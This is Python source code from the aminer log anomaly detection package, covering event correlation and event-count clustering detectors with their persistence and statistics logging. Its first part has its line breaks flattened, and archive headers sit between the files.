if log_atom.atom_time >= self.last_hypotheses_eval_timestamp + self.hypotheses_eval_delta_time: self.last_hypotheses_eval_timestamp = log_atom.atom_time empty_back_events = [] for event in self.back_hypotheses: outdated_hypotheses_indexes = [] i = 0 for implication in self.back_hypotheses[event]: if implication.stable == 0 and self.last_event_occurrence[ event] < log_atom.atom_time - self.delta_time_to_discard_hypothesis: self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 outdated_hypotheses_indexes.append(i) self.back_hypotheses_inv[implication.implied_event].remove(implication) if len(self.back_hypotheses_inv[implication.implied_event]) == 0: del self.back_hypotheses_inv[implication.implied_event] i = i + 1 # Reverse list to avoid index changes after deletions. for outdated_hypothesis_index in reversed(outdated_hypotheses_indexes): del self.back_hypotheses[event][outdated_hypothesis_index] if len(self.back_hypotheses[event]) == 0: empty_back_events.append(event) for empty_back_event in empty_back_events: del self.back_hypotheses[empty_back_event] empty_forward_events = [] for event in self.forward_hypotheses: outdated_hypotheses_indexes = [] i = 0 for implication in self.forward_hypotheses[event]: if implication.stable == 0 and implication.most_recent_observation_timestamp < log_atom.atom_time -\ self.delta_time_to_discard_hypothesis: self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 outdated_hypotheses_indexes.append(i) self.forward_hypotheses_inv[implication.implied_event].remove(implication) if len(self.forward_hypotheses_inv[implication.implied_event]) == 0: del self.forward_hypotheses_inv[implication.implied_event] i = i + 1 # Reverse list to avoid index changes after deletions. 
for outdated_hypothesis_index in reversed(outdated_hypotheses_indexes): del self.forward_hypotheses[event][outdated_hypothesis_index] if len(self.forward_hypotheses[event]) == 0: empty_forward_events.append(event) for empty_forward_event in empty_forward_events: del self.forward_hypotheses[empty_forward_event] # Remove old hypothesis candidates while len(self.hypothesis_candidates) > 0: candidate = self.hypothesis_candidates[0] if candidate[1] < log_atom.atom_time - self.hypothesis_max_delta_time: self.hypothesis_candidates.popleft() continue break # Add new hypothesis candidates rand_prob = random.uniform(0.0, 1.0) # nosec B311 if len(self.hypothesis_candidates) < self.candidates_size and rand_prob < self.generation_probability: self.hypothesis_candidates.append((log_event, log_atom.atom_time)) self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" known_path_set = set() for event_a in self.back_rules: for implication in self.back_rules[event_a]: known_path_set.add( ("back", tuple(event_a), tuple(implication.implied_event), implication.max_observations, implication.min_eval_true)) for event_a in self.forward_rules: for implication in self.forward_rules[event_a]: known_path_set.add( ("forward", tuple(event_a), tuple(implication.implied_event), implication.max_observations, implication.min_eval_true)) PersistenceUtil.store_json(self.persistence_file_name, sorted(list(known_path_set))) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", 
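self.__class__.__name__)

    def load_persistence_data(self):
        """Load the persistence data from storage.

        Each record has the shape written by do_persist():
        [direction, trigger_event, implied_event, max_observations, min_eval_true].
        Restored implications are marked stable, i.e. they become rules, never hypotheses. The file is produced
        by this component itself and is read back without schema validation, so a malformed record raises during
        initialization; records with an unknown direction are skipped silently.
        """
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            for record in persistence_data:
                implication_direction = record[0]
                # JSON has no tuple type: events were stored as lists and must be restored to the tuple form
                # that is used as dictionary key throughout the detector.
                trigger_event = tuple(record[1])
                implied_event = tuple(record[2])
                max_obs = record[3]
                min_eval_t = record[4]
                rule = Implication(trigger_event, implied_event, None, max_obs, min_eval_t)
                rule.stable = 1
                if implication_direction == "back":
                    self.back_rules.setdefault(trigger_event, []).append(rule)
                    self.back_rules_inv.setdefault(implied_event, []).append(rule)
                elif implication_direction == "forward":
                    self.forward_rules.setdefault(trigger_event, []).append(rule)
                    self.forward_rules_inv.setdefault(implied_event, []).append(rule)
        logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__)

    def log_statistics(self, component_name):
        """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        At STAT_LEVEL 1 only the counters are logged; at STAT_LEVEL 2 the newly learned rules themselves are listed as
        well. All counters and rule lists are reset afterwards, so each call reports the interval since the previous one.
        @param component_name the name of the component which is printed in the log line.
        """
        if AminerConfig.STAT_LEVEL == 1:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %s new forward rules and %s new back rules in the last 60 "
                "minutes.", component_name, self.log_success, self.log_total, self.log_forward_rules_learned, self.log_back_rules_learned)
        elif AminerConfig.STAT_LEVEL == 2:
            # The last two placeholders list the learned rules; the counters were previously passed a second time
            # by mistake, which left log_new_forward_rules / log_new_back_rules unused.
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %s new forward rules and %s new back rules in the last "
                "60 minutes. Following new forward rules were learned: %s. Following new back rules were learned: %s", component_name,
                self.log_success, self.log_total, self.log_forward_rules_learned, self.log_back_rules_learned,
                self.log_new_forward_rules, self.log_new_back_rules)
        self.log_success = 0
        self.log_total = 0
        self.log_forward_rules_learned = 0
        self.log_back_rules_learned = 0
        self.log_new_forward_rules = []
        self.log_new_back_rules = []

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """Allowlist an event generated by this source using the information emitted when generating the event.

        @param event_type type string carried by the event. receive_atom() emits events typed
               "analysis.EventCorrelationDetector" (lower case), so both that form and "Analysis.<ClassName>" are
               accepted; a strict comparison against the capitalized form rejected this detector's own events.
        @param event_data a parser path; it is appended to constraint_list so that only atoms containing it are analyzed.
        @param allowlisting_data must be None, this detector does not interpret any allowlisting payload.
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        """
        if event_type not in (f"Analysis.{self.__class__.__name__}", f"analysis.{self.__class__.__name__}"):
            msg = "Event not from this source"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if allowlisting_data is not None:
            msg = "Allowlisting data not understood by this detector"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if event_data not in self.constraint_list:
            self.constraint_list.append(event_data)
        return f"Allowlisted path {event_data} in {event_type}."

    def blocklist_event(self, event_type, event_data, blocklisting_data):
        """Blocklist an event generated by this source using the information emitted when generating the event.

        @param event_type type string carried by the event; accepted in the "Analysis.<ClassName>" form and in the
               lower-case "analysis.<ClassName>" form that receive_atom() uses when emitting events.
        @param event_data a parser path; it is appended to ignore_list so that atoms containing it are skipped.
        @param blocklisting_data must be None, this detector does not interpret any blocklisting payload.
        @return a message with information about blocklisting
        @throws Exception when blocklisting of this special event using given blocklisting_data was not possible.
        """
        if event_type not in (f"Analysis.{self.__class__.__name__}", f"analysis.{self.__class__.__name__}"):
            msg = "Event not from this source"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if blocklisting_data is not None:
            msg = "Blocklisting data not understood by this detector"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if event_data not in self.ignore_list:
            self.ignore_list.append(event_data)
        return f"Blocklisted path {event_data} in {event_type}."


class Implication:
    """Define the shape of an implication rule (trigger_event -> implied_event).

    One object serves two phases: while `stable` is 0 it is a hypothesis whose evidence accumulates in
    hypothesis_observations / hypothesis_evaluated_true; once promoted to a rule (`stable` == 1) its recent
    outcomes are kept in the bounded rule_observations deque.
    """

    def __init__(self, trigger_event, implied_event, generation_time, max_observations, min_eval_true):
        """
        @param trigger_event event tuple that triggers the implication.
        @param implied_event event tuple expected to follow (forward) or precede (back) the trigger.
        @param generation_time creation timestamp, stored as most_recent_observation_timestamp (None for persisted rules).
        @param max_observations upper bound on counted hypothesis observations and size of the rule observation window.
        @param min_eval_true minimal number of positive evaluations for the implication to count as stable.
        """
        self.trigger_event = trigger_event
        self.implied_event = implied_event
        self.stable = 0  # 0 .. unknown, 1 .. stable, -1 .. unstable
        self.max_observations = max_observations
        self.min_eval_true = min_eval_true
        self.most_recent_observation_timestamp = generation_time
        self.hypothesis_trigger_timestamps = deque([])
        self.rule_trigger_timestamps = deque([])
        self.rule_observations = deque([])
        # Hypothesis is only generated for observed implication. Thus, initialized with 1.
        self.hypothesis_observations = 1
        self.hypothesis_evaluated_true = 1

    def add_hypothesis_observation(self, result, timestamp):
        """Update the observation counts for a hypothesis.

        @param result 1 for a positive evaluation, 0 for a negative one.
        @param timestamp atom time of the evaluation; always recorded, even after counting has stopped.
        """
        self.most_recent_observation_timestamp = timestamp
        # Counting stops once max_observations is reached; the counters are not reset.
        if self.hypothesis_observations < self.max_observations:
            self.hypothesis_observations += 1
            self.hypothesis_evaluated_true += result

    def compute_hypothesis_stability(self):
        """Compute and store the stability of a hypothesis.

        @return 1 when at least min_eval_true positive evaluations were seen, -1 when more negative evaluations were
                seen than max_observations - min_eval_true allows (the hypothesis can never become stable), 0 otherwise.
        """
        if self.hypothesis_evaluated_true >= self.min_eval_true:
            # Known that hypothesis is stable.
            self.stable = 1
        elif (self.hypothesis_observations - self.hypothesis_evaluated_true) > (self.max_observations - self.min_eval_true):
            # Known that hypothesis will never be stable.
            self.stable = -1
        else:
            # Stability is still unknown, more observations required.
            self.stable = 0
        return self.stable

    def add_rule_observation(self, result):
        """Append a rule evaluation result, keeping at most max_observations entries (oldest dropped first).

        @param result 1 for a positive evaluation, 0 for a negative one.
        """
        if len(self.rule_observations) >= self.max_observations:
            self.rule_observations.popleft()
        self.rule_observations.append(result)

    def evaluate_rule(self):
        """Evaluate a rule.

        @return True while the number of negative evaluations in the window does not exceed
                max_observations - min_eval_true, False once the rule is violated.
        """
        ones = sum(self.rule_observations)
        return (len(self.rule_observations) - ones) <= (self.max_observations - self.min_eval_true)

    def __repr__(self):
        # Short form: last path component of each event plus the hypothesis and rule counters.
        # The [-1] indexing assumes non-empty event tuples.
        return str(self.trigger_event[-1]).split("/")[-1] + "->" + str(self.implied_event[-1]).split("/")[-1] + ", eval=" + str(
            self.hypothesis_evaluated_true) + "/" + str(self.hypothesis_observations) + ", rule=" + str(
            self.rule_observations) + ", ruletriggerts=" + str(self.rule_trigger_timestamps)

    def get_dictionary_repr(self):
        """Return the dictionary representation of an Implication (deques converted to lists)."""
        return {"trigger_event": self.trigger_event, "implied_event": self.implied_event, "stable": self.stable,
                "max_observations": self.max_observations, "min_eval_true": self.min_eval_true,
                "most_recent_observation_timestamp": self.most_recent_observation_timestamp,
                "hypothesis_trigger_timestamps": list(self.hypothesis_trigger_timestamps),
                "rule_trigger_timestamps": list(self.rule_trigger_timestamps), "rule_observations": list(self.rule_observations),
                "hypothesis_observations": self.hypothesis_observations, "hypothesis_evaluated_true": self.hypothesis_evaluated_true}


def set_random_seed(seed):
    """Set the random seed for testing purposes.

    Hypothesis generation in receive_atom() draws from the module-level `random` generator, so seeding it makes a
    test run reproducible. The non-cryptographic PRNG is intentional for this sampling use (bandit B311 is
    suppressed at the call sites).
    """
    random.seed(seed)
EventCountClusterDetector.py000066400000000000000000000535571500476301700364600ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis
"""This module defines a detector for clustering event and value count vectors.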
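This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import os
import logging
import math
from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \
    STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX
from aminer import AminerConfig
from aminer.AnalysisChild import AnalysisContext
from aminer.events.EventInterfaces import EventSourceInterface
from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface
from aminer.util import PersistenceUtil
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class EventCountClusterDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface):
    """Create events when the count vector of a completed time window is dissimilar to every vector in the model.

    Per id tuple (see id_path_list) the detector counts event occurrences within windows of window_size seconds. When a
    window is complete, the count vector is compared against the stored vectors with a normalized Manhattan distance
    (see check()); a vector is "normal" as soon as one stored vector is within confidence_factor of it.
    Model state is persisted as JSON via PersistenceUtil (no pickle involved).
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, window_size=600, id_path_list=None, num_windows=50,
                 confidence_factor=0.33, idf=False, norm=False, add_normal=False, check_empty_windows=True, persistence_id="Default",
                 learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None,
                 stop_learning_no_anomaly_time=None, log_resource_ignore_list=None, allow_missing_id=False):
        """Initialize the detector. This will also trigger reading or creation of persistence storage location.

        @param aminer_config configuration from analysis_context.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their
        combined occurrences. When no paths are specified, the events given by the full path list are analyzed.
        @param window_size the length of the time window for counting in seconds.
        @param id_path_list parser paths of values for which separate count vectors should be generated.
        @param num_windows the number of vectors stored in the model (per id tuple).
        @param confidence_factor maximum normalized distance to a stored vector for a window to count as normal.
        @param idf when true, value counts are weighted higher when they occur with fewer id_paths (requires that id_path_list is set).
        @param norm when true, count vectors are normalized so that only relative occurrence frequencies matter for detection.
        @param add_normal when true and learn_mode is on, count vectors classified as normal are also added to the model
        (anomalous vectors are always added while learning).
        @param check_empty_windows when true, an empty count vector is evaluated when at least one time window was skipped.
        @param persistence_id name of persistence document.
        @param learn_mode specifies whether count vectors are added to the model.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are
        omitted. The default value is [] as None is not iterable.
        @param constraint_list list of paths that have to be present in the log atom to be analyzed.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        @param log_resource_ignore_list list of log resource names whose atoms are skipped entirely.
        @param allow_missing_id when true, an id path missing in a log atom is replaced by "" instead of skipping the atom.
        Previously this attribute was read in receive_atom() but never set, so a missing id path raised AttributeError.
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5
        self.stop_learning_time_initialized = None
        # "scoring_path_list" is not a parameter of this detector; it is kept in mutable_default_args because
        # downstream event handlers may probe the attribute on any event source (not visible here, so left unchanged).
        super().__init__(mutable_default_args=[
            "target_path_list", "scoring_path_list", "ignore_list", "constraint_list", "id_path_list", "log_resource_ignore_list"],
            aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list,
            window_size=window_size, id_path_list=id_path_list, num_windows=num_windows, confidence_factor=confidence_factor, idf=idf,
            norm=norm, add_normal=add_normal, check_empty_windows=check_empty_windows, persistence_id=persistence_id,
            learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list,
            stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time,
            log_resource_ignore_list=log_resource_ignore_list)
        # Set directly rather than via the base class so the fix does not depend on the base class' kwarg handling.
        self.allow_missing_id = allow_missing_id
        self.next_check_time = {}
        self.counts = {}
        self.known_counts = {}
        self.idf_total = set()
        self.idf_counts = {}
        self.log_windows = 0
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        self.load_persistence_data()

    def receive_atom(self, log_atom):
        """Receive a log atom from a source.

        Derives the log event (full path tuple or target_path_list values) and the id tuple, closes the time window of
        that id tuple when log_atom.atom_time exceeds it (running detection on the completed window), and then counts
        the event in the current window.
        @return True when the atom was counted, False when it was skipped (ignored resource, ignore/constraint lists,
        no usable value, missing id path).
        """
        for source in self.log_resource_ignore_list:
            if log_atom.source.resource_name.decode() == source:
                return False
        parser_match = log_atom.parser_match
        self.log_total += 1
        if not self.stop_learning_time_initialized:
            self.stop_learning_time_initialized = True
            if self.stop_learning_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_time
            elif self.stop_learning_no_anomaly_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time
        if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False

        # Skip paths from ignore list.
        for ignore_path in self.ignore_list:
            if ignore_path in parser_match.get_match_dictionary().keys():
                return False

        if self.target_path_list is None or len(self.target_path_list) == 0:
            # Event is defined by the full path of log atom.
            constraint_path_flag = False
            for constraint_path in self.constraint_list:
                if parser_match.get_match_dictionary().get(constraint_path) is not None:
                    constraint_path_flag = True
                    break
            if not constraint_path_flag and self.constraint_list != []:
                return False
            log_event = tuple(parser_match.get_match_dictionary().keys())
        else:
            # Event is defined by value combos in target_path_list
            values = []
            all_values_none = True
            for path in self.target_path_list:
                match = parser_match.get_match_dictionary().get(path)
                if match is None:
                    continue
                matches = []
                if isinstance(match, list):
                    matches = match
                else:
                    matches.append(match)
                for match in matches:
                    # NOTE(review): decode() has no error handler; undecodable bytes in a match raise here instead
                    # of being reported as an anomaly (the parser may already guarantee decodability; confirm).
                    if isinstance(match.match_object, bytes):
                        value = match.match_object.decode(AminerConfig.ENCODING)
                    else:
                        value = str(match.match_object)
                    if value is not None:
                        all_values_none = False
                    values.append(value)
            if all_values_none is True:
                return False
            log_event = tuple(values)

        # In case that id_path_list is set, use it to differentiate count vectors by their id.
        # Otherwise, the empty tuple () is used as the only key of the counts dicts.
        id_tuple = ()
        for id_path in self.id_path_list:
            id_match = parser_match.get_match_dictionary().get(id_path)
            if id_match is None:
                if self.allow_missing_id is True:
                    # Insert placeholder for id_path that is not available
                    id_tuple += ("",)
                else:
                    # Omit log atom if one of the id paths is not found.
                    return False
            else:
                matches = []
                if isinstance(id_match, list):
                    matches = id_match
                else:
                    matches.append(id_match)
                for match in matches:
                    if isinstance(match.match_object, bytes):
                        id_tuple += (match.match_object.decode(AminerConfig.ENCODING),)
                    else:
                        id_tuple += (match.match_object,)

        # Create entry for the id_tuple in the model if it did not occur before.
        if id_tuple not in self.known_counts:
            self.known_counts[id_tuple] = []

        # Update statistics for idf computation
        if self.idf and self.id_path_list:
            self.idf_total.add(id_tuple)
            if log_event in self.idf_counts:
                self.idf_counts[log_event].add(id_tuple)
            else:
                self.idf_counts[log_event] = {id_tuple}

        if id_tuple not in self.next_check_time:
            # First processed log atom, initialize next check time.
            self.next_check_time[id_tuple] = log_atom.atom_time + self.window_size
            self.log_windows += 1
        elif log_atom.atom_time >= self.next_check_time[id_tuple]:
            # Log atom exceeded next check time; time window is complete.
            self.next_check_time[id_tuple] = self.next_check_time[id_tuple] + self.window_size
            self.log_windows += 1

            # Update next_check_time if a time window was skipped
            skipped_windows = 0
            if log_atom.atom_time >= self.next_check_time[id_tuple]:
                skipped_windows = 1 + int((log_atom.atom_time - self.next_check_time[id_tuple]) / self.window_size)
                self.next_check_time[id_tuple] = self.next_check_time[id_tuple] + skipped_windows * self.window_size
                # One empty vector is evaluated regardless of how many windows were skipped; add_to_model deduplicates
                # identical vectors anyway, so only the number of emitted events would differ.
                if self.check_empty_windows:
                    self.detect(log_atom, id_tuple, {})  # Empty count vector
            self.detect(log_atom, id_tuple, self.counts[id_tuple])

            # Reset counts vector
            self.counts[id_tuple] = {}

        # Increase count for observed events
        if id_tuple in self.counts:
            if log_event in self.counts[id_tuple]:
                self.counts[id_tuple][log_event] += 1
            else:
                self.counts[id_tuple][log_event] = 1
        else:
            self.counts[id_tuple] = {log_event: 1}
        self.log_success += 1
        return True

    def add_to_model(self, id_tuple, count_vector):
        """Add a count vector to the model of id_tuple (a FIFO list of at most num_windows distinct count vectors).

        Identical vectors are stored only once; when the list is full the oldest entry is dropped first.
        """
        if count_vector in self.known_counts[id_tuple]:
            # Avoid that model has identical count vectors multiple times
            return
        if len(self.known_counts[id_tuple]) >= self.num_windows:
            # Drop first (= oldest) count vector
            self.known_counts[id_tuple] = self.known_counts[id_tuple][1:]
        self.known_counts[id_tuple].append(count_vector)

    def detect(self, log_atom, id_tuple, count_vector):
        """Compare count_vector against the model of id_tuple, update the model while learning and emit an event on anomaly.

        @param log_atom the atom that closed the window; used for the event output, not for counting.
        @param id_tuple key of the model the vector belongs to.
        @param count_vector dict mapping log events to their occurrence counts in the completed window.
        """
        score = self.check(id_tuple, count_vector)
        if score == -1:
            # Sample is normal, only add to known values when add_normal is set
            if self.learn_mode and self.add_normal:
                self.add_to_model(id_tuple, count_vector)
        else:
            # Sample is anomalous, add to model when training and create event
            if self.learn_mode:
                self.add_to_model(id_tuple, count_vector)
            try:
                data = log_atom.raw_data.decode(AminerConfig.ENCODING)
            except UnicodeError:
                data = repr(log_atom.raw_data)
            if self.output_logline:
                original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
                sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data]
            else:
                sorted_log_lines = [data]
            analysis_component = {"AffectedLogAtomPaths": self.target_path_list,
                                  "AffectedLogAtomValues": list(count_vector.keys()),
                                  "AffectedLogAtomFrequencies": list(count_vector.values())}
            # id_path_list defaults to [] (mutable_default_args), so this key is present in every event.
            if self.id_path_list is not None:
                analysis_component["AffectedIdValues"] = list(id_tuple)
            count_info = {"ConfidenceFactor": self.confidence_factor, "Confidence": score}
            event_data = {"AnalysisComponent": analysis_component, "CountData": count_info}
            for listener in self.anomaly_event_handlers:
                listener.receive_event(f"Analysis.{self.__class__.__name__}", "Frequency anomaly detected", sorted_log_lines,
                                       event_data, log_atom, self)
            # Same handling as in EventFrequencyDetector: an anomaly postpones the "no anomaly for this long" learning
            # stop. Without this, stop_learning_no_anomaly_time behaved exactly like stop_learning_time in this detector.
            if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None:
                self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time)

    def check(self, id_tuple, count_vector):
        """Compute the normalized Manhattan distance between count_vector and each vector in the model of id_tuple.

        @return -1 as soon as one stored vector is within confidence_factor (the vector is normal; remaining vectors are
        not checked), otherwise the smallest distance found (1 when the model is empty).
        """
        min_score = 1
        for known_count in self.known_counts[id_tuple]:
            # Iterate over all count vectors in the model
            manh = 0
            manh_max = 0
            for element in set(list(known_count.keys()) + list(count_vector.keys())):
                # Iterate over each val that occurs in one of the vectors
                idf_fact = 1
                if self.idf and self.id_path_list:
                    # Compute idf (weight rare value higher than ones that occur with many id_values).
                    # NOTE(review): raises KeyError for an element of a persisted vector that has no idf_counts entry
                    # (e.g. idf enabled after the model was persisted without idf data); not changed here.
                    idf_fact = math.log10((1 + len(self.idf_total)) / len(self.idf_counts[element]))
                norm_sum_known = 1
                norm_sum_count = 1
                if self.norm:
                    # Normalize vectors by dividing through sum. A zero sum only occurs for an empty vector, whose
                    # elements never reach the branch dividing by it.
                    norm_sum_known = sum(known_count.values())
                    norm_sum_count = sum(count_vector.values())
                if element not in known_count:
                    manh += count_vector[element] * idf_fact / norm_sum_count
                    manh_max += count_vector[element] * idf_fact / norm_sum_count
                elif element not in count_vector:
                    manh += known_count[element] * idf_fact / norm_sum_known
                    manh_max += known_count[element] * idf_fact / norm_sum_known
                else:
                    manh += abs(count_vector[element] * idf_fact / norm_sum_count - known_count[element] * idf_fact / norm_sum_known)
                    manh_max += max(count_vector[element] * idf_fact / norm_sum_count, known_count[element] * idf_fact / norm_sum_known)
            score = 0
            if manh_max != 0:
                # manh_max is zero when both vectors are empty; then the score stays at 0, otherwise normalize.
                score = manh / manh_max
            if score <= self.confidence_factor:
                # Found similar vector; abort early to avoid spending time on more checks.
                # Return -1 since the "true" score is unknown as not all vectors in the model were checked.
                return -1
            min_score = min(min_score, score)
        return min_score

    def do_timer(self, trigger_time):
        """Check if current ruleset should be persisted.

        @return seconds until the next persistence check (the configured persistence period after persisting).
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = trigger_time + delta
        return delta

    def do_persist(self):
        """Immediately write persistence data to storage (JSON via PersistenceUtil.store_json).

        All lists are sorted for a deterministic file layout. Note that sorting the per-id vector list discards the
        FIFO order, so after a restart add_to_model evicts in sorted rather than insertion order.
        Sorting also assumes comparable id values; mixed types within the id tuples would raise TypeError here.
        """
        known_counts_data = []
        for id_tuple, vec_list in self.known_counts.items():
            id_tuple_data = []
            for vec_elem in vec_list:
                window_data = [(log_ev, freq) for log_ev, freq in vec_elem.items()]
                id_tuple_data.append(sorted(window_data))
            known_counts_data.append((id_tuple, sorted(id_tuple_data)))
        idf_total_data = []
        idf_counts_data = []
        if self.idf and self.id_path_list:
            idf_total_data = list(self.idf_total)
            for log_ev, id_list in self.idf_counts.items():
                idf_counts_data.append((log_ev, sorted(id_list)))
        persist_data = [sorted(known_counts_data), sorted(idf_total_data), sorted(idf_counts_data)]
        PersistenceUtil.store_json(self.persistence_file_name, persist_data)
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def load_persistence_data(self):
        """Load the persistence data from storage.

        Expected layout (written by do_persist, tuples arrive as lists): [known_counts, idf_total, idf_counts] with
        known_counts = [[id_tuple, [[[log_event, count], ...], ...]], ...], idf_total = [id_tuple, ...] and
        idf_counts = [[log_event, [id_tuple, ...]], ...]. The file is trusted: malformed content raises
        IndexError/TypeError here instead of being reported.
        """
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            for elem in persistence_data[0]:
                window_list = []
                for log_ev_elem_list in elem[1]:
                    elem_dict = {}
                    for log_ev_elem in log_ev_elem_list:
                        elem_dict[tuple(log_ev_elem[0])] = int(log_ev_elem[1])
                    window_list.append(elem_dict)
                self.known_counts[tuple(elem[0])] = window_list
            for elem in persistence_data[1]:
                self.idf_total.add(tuple(elem))
            for elem in persistence_data[2]:
                id_elem_set = set()
                for id_elem in elem[1]:
                    id_elem_set.add(tuple(id_elem))
                self.idf_counts[tuple(elem[0])] = id_elem_set
            logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__)

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """Allowlist an event generated by this source using the information emitted when generating the event.

        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        """
        if event_type != f"Analysis.{self.__class__.__name__}":
            msg = "Event not from this source"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if allowlisting_data is not None:
            msg = "Allowlisting data not understood by this detector"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        # event_data is appended unvalidated; it is treated as a trusted parser path supplied by the caller.
        if event_data not in self.constraint_list:
            self.constraint_list.append(event_data)
        return f"Allowlisted path {event_data} in {event_type}."

    def blocklist_event(self, event_type, event_data, blocklisting_data):
        """Blocklist an event generated by this source using the information emitted when generating the event.

        @return a message with information about blocklisting
        @throws Exception when blocklisting of this special event using given blocklisting_data was not possible.
        """
        if event_type != f"Analysis.{self.__class__.__name__}":
            msg = "Event not from this source"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if blocklisting_data is not None:
            msg = "Blocklisting data not understood by this detector"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        # event_data is appended unvalidated; it is treated as a trusted parser path supplied by the caller.
        if event_data not in self.ignore_list:
            self.ignore_list.append(event_data)
        return f"Blocklisted path {event_data} in {event_type}."

    def log_statistics(self, component_name):
        """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        @param component_name the name of the component which is printed in the log line.
        """
        # STAT_LEVEL 1 and 2 emitted the same line for this detector; merged into one branch.
        if AminerConfig.STAT_LEVEL in (1, 2):
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully in %d time windows in the last 60 minutes.",
                component_name, self.log_success, self.log_total, self.log_windows)
        self.log_success = 0
        self.log_total = 0
        self.log_windows = 0
EventFrequencyDetector.py000066400000000000000000001025741500476301700357670ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for event and value frequency deviations.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
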